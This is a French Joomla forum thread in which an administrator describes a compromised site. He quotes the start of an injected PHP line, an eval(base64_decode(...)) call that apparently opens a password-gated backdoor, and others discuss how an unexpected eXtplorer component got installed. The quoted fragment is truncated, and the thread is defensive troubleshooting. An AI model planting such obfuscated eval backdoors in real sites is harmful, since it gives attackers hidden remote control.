Piratage

Réduire
X
 
  • Filtrer
  • Heure
  • Afficher
Tout effacer
nouveaux messages

  • Piratage

    Bonjour à tou(te)s,

    J'administre un site en (joomla 2.5.7) [.8 depuis ce matin !)
    Depuis quelques jours, le site que j'administre n'était plus accessible et donnait une page blanche.
    Un copain a eu l'idée de regarder la source de cette page, pour s'apercevoir que c'était le index.php du template qui avait été modifié, avec une redirection qui ne marchait d'ailleurs pas.
    le début du fichier :

    Code:
    <?php eval(base64_decode('aWYgKG1kNSgkX1BPU1RbJ3A0YzM0YiddKSA9
    j'ai remis le bon index.php, puis j'ai cherché d'où ça pouvait bien provenir.
    Les logs FTP ne donnant rien, j'ai finalement trouvé sur le site un module exTplorer que je n'avais jamais installé.
    OK, je l'ai désinstallé, mais ce que je me demande, c'est comment il a pu venir là ? je n'ai rien trouvé sur le net qui parle de ce genre de problème.
    Si je n'ai aucune idée de ce qui s'est passé, je risque fort de me retrouver à nouveau avec le problème, non ?

    D'avance merci pour toute suggestion.

  • #2
    Re : Piratage

    Comme je l'explique sur l'autre forum :
    Si le composant (et non module) eXtplorer a été installé dans l'administration de Joomla!, c'est que quelqu'un avait un accès à celle-ci avec des droits d'administration suffisants pour le faire.
    Une telle installation ne peut en effet se faire que via la gestion des extensions de Joomla!, une simple copie par ftp nécessitant de bricoler la base de données, ce dont je doute de la part d'un pirate qui n'y perdrait pas de temps s'il a déjà l'accès au ftp.
    "Patience et longueur de temps font plus que force ni que rage..." (La Fontaine : Le Lion et le Rat) - "Il n'y a pas de problèmes; il n'y a que des solutions" (André Gide).
    MoovJla et LazyDbBackup sur www.joomxtensions.com - FaQ sur www.fontanil.info - Site pro : www.robertg-conseil.fr chez PHPNET, sites perso chez PlanetHoster + sites gérés chez PHPNET, PlanetHoster, Ionos et OVH

    Commentaire


    • #3
      Re : Piratage

      Bonjour,

      S'agit-il du composant Extplorer qui a été installé, ou le standalone venant de sourceforge ?

      S'il s'agit du composant, RoberG a fourni la réponse.
      S'il s'agit du standa alone, le pirate n'a pu s'introduire que via FTP ou en utilisant une faille de certains builds PHP-CGI.
      Pas de demande de support par MP.
      S'il n'y a pas de solution, c'est qu'il n'y a pas de problème (Devise Shadok)

      Commentaire


      • #4
        Re : Piratage

        non, c'est le composant, j'ai vu la réponse de Robert.
        Mais comme deux personnes uniquement connaissent le mot de passe (à ma connaissance) c'est curieux !
        on verra de toutes façons...

        Commentaire

        Annonce

        Réduire
        Aucune annonce pour le moment.

        Partenaire de l'association

        Réduire

        Hébergeur Web PlanetHoster
        Travaille ...
        X